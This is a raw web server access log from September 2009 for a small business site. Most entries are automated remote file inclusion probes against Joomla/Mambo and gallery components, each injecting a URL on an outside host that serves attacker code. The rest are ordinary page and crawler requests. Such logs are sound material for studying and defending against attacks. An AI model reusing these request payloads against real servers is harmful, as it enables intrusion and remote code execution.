193.192.122.30 - - [04/Sep/2009:00:20:34 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
193.192.122.30 - - [04/Sep/2009:00:20:34 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
75.21.195.220 - - [04/Sep/2009:00:20:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.21.195.220 - - [04/Sep/2009:00:21:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.21.195.220 - - [04/Sep/2009:00:21:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.21.195.220 - - [04/Sep/2009:00:21:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.75.220.49 - - [04/Sep/2009:00:21:13 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.75.220.49 - - [04/Sep/2009:00:21:13 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.75.220.49 - - [04/Sep/2009:00:21:13 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.181.7.56 - - [04/Sep/2009:00:21:51 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
204.3.129.73 - - [04/Sep/2009:00:22:03 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0" 404 262 "-" "Mozilla/5.0"
204.3.129.73 - - [04/Sep/2009:00:22:58 -0400] "GET /index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0" 404 207 "-" "Mozilla/5.0"
204.3.129.73 - - [04/Sep/2009:00:22:58 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0" 404 212 "-" "Mozilla/5.0"
222.122.72.216 - - [04/Sep/2009:00:23:20 -0400] "GET /logs/access_log.Q109052200//stats/modules/My_eGallery/index.php?basepath=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.72.216 - - [04/Sep/2009:00:23:20 -0400] "GET //stats/modules/My_eGallery/index.php?basepath=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
222.122.72.216 - - [04/Sep/2009:00:23:24 -0400] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://shinan.hongik.ac.kr/~chemsys/bbs/data/ida.php?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
110.45.146.223 - - [04/Sep/2009:00:23:47 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:23:48 -0400] "GET //?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:00:23:47 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 200 16431 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:00:24:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.242.165.138 - - [04/Sep/2009:00:24:27 -0400] "GET /index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
123.242.165.138 - - [04/Sep/2009:00:24:27 -0400] "GET /logs/access_log.Q109081100/index1.php?author=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
